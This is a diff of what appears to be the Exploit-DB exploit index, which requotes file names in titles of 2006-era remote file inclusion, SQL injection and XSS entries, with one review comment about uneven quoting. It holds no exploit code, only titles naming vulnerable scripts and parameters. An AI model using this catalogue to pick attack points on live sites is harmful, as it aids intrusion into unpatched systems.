 27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
@@ -30121,7 +30125,7 @@ id,file,description,date,author,platform,type,port
 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
-27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0
+27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File Inclusion",2006-06-02,Canberx,php,webapps,0
 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0
 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0
 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0
@@ -30154,7 +30158,7 @@ id,file,description,date,author,platform,type,port
 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0
 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0
 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0
-28024,platforms/php/webapps/28024.txt,"phpBB - BBRSS.php Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0
+28024,platforms/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0
 28025,platforms/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0
 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0
 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0
@@ -30203,7 +30207,7 @@ id,file,description,date,author,platform,type,port
 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0
 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0
 28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0
-28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0
+28105,platforms/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,php,webapps,0
 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0
 28107,platforms/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0
 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps,0
@@ -30212,10 +30216,10 @@ id,file,description,date,author,platform,type,port
 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - header.php title Parameter Cross-Site Scripting",2006-06-26,simo64,php,webapps,0
 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0
 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0
-28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0
+28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0
 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0
 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0
-28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - admin.php Remote File Inclusion",2006-06-27,botan,php,webapps,0
+28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,php,webapps,0
 28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0
 28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0
 28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0
@@ -30233,7 +30237,7 @@ id,file,description,date,author,platform,type,port
 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
-28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0
+28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0
 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0
 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0
 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0
@@ -30255,7 +30259,7 @@ id,file,description,date,author,platform,type,port
 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0
 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0
 28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps,0
-28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - Thumb.php Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0
+28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps,0
 28171,platforms/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps,0
 28273,platforms/php/webapps/28273.txt,"PHPSavant Savant2 - Stylesheet.php MosConfig_absolute_path Parameter Remote File Inclusion",2006-07-25,botan,php,webapps,0
 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0
@@ -30267,11 +30271,11 @@ id,file,description,date,author,platform,type,port
 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0
 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0
 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0
-28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - Extcalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0
+28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0
 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0
 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0
 28193,platforms/asp/webapps/28193.txt,"Webvizyon - SayfalaAltList.asp SQL Injection",2006-07-08,StorMBoY,asp,webapps,0
-28195,platforms/php/webapps/28195.txt,"RW::Download - stats.php Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0
+28195,platforms/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0
 28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0
 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps,0
 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0
@@ -30283,9 +30287,9 @@ id,file,description,date,author,platform,type,port
 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0
 28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - picture.php img Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0
 28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - PhotoCycle.php Parameter Cross-Site Scripting",2006-07-13,Luny,php,webapps,0
-28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0
+28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion",2006-07-13,Solpot,php,webapps,0
 28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps,0
-28217,platforms/php/webapps/28217.txt,"Forum 5 - pm.php Local File Inclusion",2006-07-13,rgod,php,webapps,0
+28217,platforms/php/webapps/28217.txt,"Forum 5 - 'pm.php' Local File Inclusion",2006-07-13,rgod,php,webapps,0
 28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0
 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0
@@ -30300,12 +30304,12 @@ id,file,description,date,author,platform,type,port
 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0
-28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0
+28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps,0
 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
 28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0
 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
-28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
+28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0
 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0
 28269,platforms/php/webapps/28269.txt,"LinksCaffe 3.0 - links.php newdays Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0
@@ -30320,7 +30324,7 @@ id,file,description,date,author,platform,type,port
 28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
 28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0
-28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0
+28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0
 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0
 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0
 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0
@@ -30335,11 +30339,11 @@ id,file,description,date,author,platform,type,port
 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections",2006-07-31,SirDarckCat,php,webapps,0
 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0
 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0
-28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0
+28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0
 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0
 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0
-28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0
+28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0
 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
@@ -30357,29 +30361,29 @@ id,file,description,date,author,platform,type,port
 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0
 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps,0
 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
-28350,platforms/php/webapps/28350.txt,"VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28351,platforms/php/webapps/28351.txt,"VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28352,platforms/php/webapps/28352.txt,"VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28353,platforms/php/webapps/28353.txt,"VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28354,platforms/php/webapps/28354.txt,"VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28355,platforms/php/webapps/28355.txt,"VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
-28356,platforms/php/webapps/28356.txt,"VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28350,platforms/php/webapps/28350.txt,"VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28351,platforms/php/webapps/28351.txt,"VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28352,platforms/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28353,platforms/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28354,platforms/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28355,platforms/php/webapps/28355.txt,"VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
+28356,platforms/php/webapps/28356.txt,"VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0
 28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0
 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
-28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
+28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0
 28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
-28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
+28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0
 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0
 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0
-28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0
+28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0
 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0
 28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0
 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
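Review bot: The seven VWar rows (28350–28356) quote the file name but leave the parameter bare, e.g. `'war.php' vwar_root Parameter Remote File Inclusion`. Row 28392 in this same hunk and row 28317 in the previous hunk quote both parts (`'hsList.php' 'subdir' Parameter`), so the normalisation is applied unevenly within one commit. Writing these as `'war.php' 'vwar_root' Parameter Remote File Inclusion` would keep the description column uniform for anyone who searches or parses titles by the quoted file/parameter pair.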
@@ -30405,7 +30409,7 @@ id,file,description,date,author,platform,type,port
 28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0
 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
-28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
+28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
 28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
@@ -30444,9 +30448,9 @@ id,file,description,date,author,platform,type,port
 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0
 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 - Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0
 28485,platforms/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0
-28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
+28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0
-28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0
+28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,php,webapps,0
 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0
 28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - Joueurs.php SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0
 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0
@@ -30468,8 +30472,8 @@ id,file,description,date,author,platform,type,port
 28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
 40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
-28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
-28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
+28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
+28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
 28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0
 28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0
 28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0
@@ -30605,13 +30609,13 @@ id,file,description,date,author,platform,type,port
 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0
 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - admin.php do Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0
 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
-28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - Common.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
+28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
